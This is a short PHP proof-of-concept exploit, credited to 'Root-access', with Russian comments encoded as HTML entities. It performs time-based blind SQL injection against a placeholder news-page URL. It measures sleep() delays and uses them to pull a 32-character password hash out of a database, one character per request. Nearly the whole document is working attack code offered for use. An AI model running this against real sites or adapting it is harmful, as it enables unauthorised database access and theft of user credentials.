Root-access

<?php
$url = "http://site.ru/news.php?id=1"; //URL &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1072; &#1076;&#1086; "+AND+..."
$id = 0; //&#1053;&#1086;&#1084;&#1077;&#1088; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
$coef = 2; //&#1052;&#1085;&#1086;&#1078;&#1080;&#1090;&#1077;&#1083;&#1100;
$try = 5; //&#1050;&#1086;&#1083;-&#1074;&#1086; &#1087;&#1088;&#1086;&#1074;&#1077;&#1088;&#1086;&#1095;&#1085;&#1099;&#1093; &#1079;&#1072;&#1087;&#1088;&#1086;&#1089;&#1086;&#1074;
function avrg($arr) {
     foreach ($arr as $val) {
          $sum+=$val;
     }
     return $sum/count($arr);
}
function delta($url) {
     $tests = array();
     for($i=0;$i<=$try;$i++) {
          $time = time()+microtime();
          file_get_contents("$url+and+sleep(1)");
          $tests[$i] = time()+microtime()-$time;
     }
     return avrg($tests);
}
function testtime($url) {
        $time = time()+microtime();
        file_get_contents($url);
        return time()+microtime()-$time;
}
$delta = round($coef*delta($url));
$testtime=testtime($url);
echo "<b>Blind SQL-Injection pattern PoC-exploit by Root-access</b><br>";
echo "Request type: $url+and+sleep(substring(version(),1,1))<br>";
echo "Test time: $testtime<br>";
$sym = array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
$res = "";
for($i=1;$i<33;$i++) {
        $time = time()+microtime();
        file_get_contents("$url+and+sleep($delta*(instr(0x30313233343536373839616263646566,substring((select+password+from+test+limit+$id,1),$i,1))))");
        $res = $res.$sym[round((time()+microtime()-$time-$testtime)/2-1)];
}
echo "Hash: ".$res;
?>